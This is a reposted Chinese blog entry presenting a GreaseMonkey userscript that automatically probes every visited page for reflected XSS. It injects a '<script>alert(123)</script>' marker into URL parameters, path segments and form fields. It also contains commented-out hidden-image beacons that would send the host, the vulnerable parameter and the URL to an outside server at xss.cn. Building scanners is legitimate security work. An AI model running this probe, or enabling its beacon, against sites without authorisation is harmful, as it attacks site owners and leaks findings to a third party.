GreaseMonkey开发:开发一款自动化检测XSS插件
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了GreaseMonkey开发:开发一款自动化检测XSS插件相关的知识,希望对你有一定的参考价值。
引用了black-hole的代码,封装成GreaseMonkey的插件。
1 // ==UserScript== 2 // @name xss 3 // @namespace xss 4 // @version 1 5 // @grant none 6 // ==/UserScript== 7 8 var onlyString ="woainixss<script>alert(123)</script>"; //唯一标识符 9 var protocol = window.location.protocol; //网站使用的网络协议(http、https等) 10 var host = window.location.host; //网站的主域名(*.com、*.cn等,例:test.cn) 11 var href = window.location.href; //网站的完整URL(协议+域名+参数+锚) 12 var hostPath; //用来存放网站除去参数的字符串(协议+域名+锚) 13 var urlPath; //用来存放网站URL路径的数组(例:test.cn/test/xss/123 urlPath = [‘test‘,‘xss’,‘123‘]) 14 15 if(href.indexOf("?") != "-1"){ //如果url存在?字符串(存在?基本就存在参数了) 16 hostPath = href.slice(0,href.indexOf("?")); //去除参数,只留下“协议+域名+锚” 17 }else{ 18 hostPath = href; //不存在?则把完整的url赋值给hostPath。 19 } 20 urlPath = hostPath.split("/").splice(3); //以“/”为分隔符,把路径分割成数组。 21 //alert("hostPath:"+hostPath+" "+"urlPath:"+urlPath); 22 23 if(location.search != ""){ //当参数不为空时,跳转到parameter_Xss函数里 24 //alert("parameter_Xss"); 25 parameter_Xss(); 26 } 27 if(href.split("/")[3] != ""){ //当完整的URL里第三个/后存在字符串,则跳转到pseudoStatic_Xss函数里 28 //alert("pseudoStatic_Xss"); 29 pseudoStatic_Xss(); 30 } 31 if($("form").length > 0){ //当页面存在form表单,就跳转到form_Xss函数里 32 form_Xss(); 33 } 34 35 36 function parameter_Xss(){ 37 // alert("parameter_Xss start"); 38 var i; //for循环里的i 39 var parameter = location.search.substring(1).split("&"); //把URL字符以&分割成字符串 40 var url = protocol + "//" + host + "/" + urlPath.join("/") + "?"; //拼接成新的URL字符。(例:http://test.cn/test/xss/123?) 41 for(i = 0;i < parameter.length;i++){ //for循环,有多少个参数就循环多少次 42 var parameterData = parameter[i]; 43 parameter[i] = parameter[i].split("=")[0] + "=" + parameter[i].split("=")[1] + onlyString; 44 //alert(url+parameter.join("&")); 45 $.ajax({ 46 url: url+parameter.join("&"), 47 type: ‘get‘, 48 dataType: ‘text‘, 49 async:false, 50 success:function(data){ 51 // alert("+++++++++++++++++++++++++++"); 52 if(data.indexOf(parameter[i].split("=")[1]) != "-1"){ 53 alert(parameter[i]); 54 // $("body").append("<img src=‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>"); 55 } 56 }, 57 error:function(){ 58 alert("error"); 59 } 60 }) 61 parameter[i] = parameterData; 62 } 63 // alert("parameter_Xss over"); 64 } 65 66 function pseudoStatic_Xss(){ //伪静态检测XSS 67 // alert("pseudoStatic_Xss start"); 68 var fileURL; 69 var fileUrlXss; 70 var url; 71 var xss = ""; 72 if(urlPath[urlPath.length-1].indexOf(".") != "-1"){ 73 fileURL = urlPath.pop(); 74 fileUrlXss = fileURL.split(".")[0] + onlyString + "." + fileURL.split(".")[1] 75 $.ajax({ 76 url: protocol + "//" + host + "/" + urlPath.join("/") + "/" + fileUrlXss, 77 type: ‘get‘, 78 dataType: ‘text‘, 79 async:false, 80 success:function(data){ 81 // alert("==================================="); 82 if(data.indexOf(fileUrlXss) != "-1"){ 83 xss += fileURL + "|"; 84 // $("body").append("<img src=‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>"); 85 } 86 }, 87 error:function(){ 88 // alert("error"); 89 } 90 }) 91 }else{ 92 fileURL = ""; 93 console.log(urlPath) 94 if(urlPath[urlPath.length-1] == ""){ 95 urlPath.pop(); 96 } 97 } 98 for(var i = 0;i < urlPath.length;i++){ 99 urlPath[i] += onlyString; 100 url = protocol + "//" + host + "/" + urlPath.join("/") + "/" + fileURL; 101 $.ajax({ 102 url: url, 103 type: ‘post‘, 104 dataType: ‘text‘, 105 async:false, 106 success:function(data){ 107 // alert("==================================="); 108 if(data.indexOf(urlPath[i]) != "-1"){ 109 xss += urlPath[i].substring(0,urlPath[i].length-11) + "|"; 110 // $("body").append("<img src=‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>"); 111 } 112 }, 113 error:function(){ 114 // alert("error"); 115 } 116 }) 117 urlPath[i] = urlPath[i].substring(0,urlPath[i].length-11); 118 } 119 if(xss == ""){ 120 return false; 121 }else{ 122 xss = xss.substring(0,xss.length-1); 123 alert("当前伪静态路径或者文件" + xss + "存在XSS漏洞"); 124 //$("body").append("<img src=‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + xss + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>"); 125 } 126 // alert("pseudoStatic_Xss over"); 127 } 128 129 function form_Xss(){ //form表单检测XSS 130 // alert("form_Xss start"); 131 var tureForm; 132 var tureInput; 133 var formImg; 134 var actionUrl; 135 var methodType; 136 var sendData = ""; 137 var sendDataUrl; 138 var i; 139 var j; 140 tureForm = $("form").filter(function(item,index){ 141 var imgArray = []; 142 $(index).find("img").map(function(number,imgSrc){ 143 imgArray.push($(imgSrc).attr("src")); 144 }); 145 if(imgArray.length > 0){ 146 for(i = 0;i < imgArray.length;i++){ 147 if(imgArray[i].indexOf("?") != "-1"){ 148 imgArray[i] = imgArray[i].slice(0,imgArray[i].indexOf("?")); 149 } 150 imgArray[i] = imgArray[i].substr(imgArray[i].lastIndexOf("."),imgArray[i].length); 151 if((imgArray[i] != ".png")&&(imgArray[i] != ".jpg")&&(imgArray[i] != ".jpeg")&&(imgArray[i] != ".gif")){ 152 return false; 153 }else{ 154 return ($(index).find(":input:not(:submit)").length > 0); 155 } 156 } 157 }else{ 158 return ($(index).find(":input:not(:submit)").length > 0); 159 } 160 }) 161 if(tureForm.length <= 0){ 162 return false; 163 } 164 tureForm = $(tureForm).filter(function(item,index){ 165 var inputName = $(index).find(":input:not(:submit)"); 166 for(i = 0;i < inputName.length;i++){ 167 return (inputName[i].getAttribute("name")); 168 } 169 }) 170 if(tureForm.length <= 0){ 171 return false; 172 } 173 for(i = 0;i < tureForm.length;i++){ 174 actionUrl = $(tureForm[i]).attr("action"); 175 methodType = $(tureForm[i]).attr("method"); 176 if(actionUrl == undefined || actionUrl == "#" || actionUrl == ""){ 177 actionUrl = href; 178 } 179 if(methodType == undefined || methodType == "#"){ 180 methodType = "get"; 181 } 182 tureInput = $(tureForm[i]).find("input:not(:submit)").length 183 for(j = 0;j < tureInput;j++){ 184 sendData += $(tureForm[i]).find("input:not(:submit)")[j].getAttribute("name") + "=" + onlyString + j + "&"; 185 } 186 sendDataUrl = sendData.substring(0,sendData.length-1); 187 $.ajax({ 188 url: actionUrl, 189 type: methodType, 190 dataType: ‘text‘, 191 data: sendDataUrl, 192 async:false, 193 success:function(data){ 194 // alert("**************************************"); 195 var xss = ""; 196 for(j = 0;j < tureInput;j++){ 197 if(data.indexOf(onlyString + j) != "-1"){ 198 xss += j + 1 + "|"; 199 } 200 } 201 if(xss == ""){ 202 return false; 203 }else{ 204 xss = xss.substring(0,xss.length-1); 205 // alert("当前页面action为" + actionUrl + "的form表单第" + xss + "个input存在XSS漏洞"); 206 $(tureForm[i]).find("input").eq(xss - 1).css("border"," 3px solid red") 207 .val("此输入框存在XSS "); 208 // $("body").append("<img src=‘http://xss.cn/formXSS.html?host=$" + href + "&$xss=$" + xss + "&$url=$" +actionUrl + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>"); 209 } 210 }, 211 error:function(){ 212 // alert("error"); 213 } 214 }) 215 } 216 // alert("form_Xss over"); 217 }
以上是关于GreaseMonkey开发:开发一款自动化检测XSS插件的主要内容,如果未能解决你的问题,请参考以下文章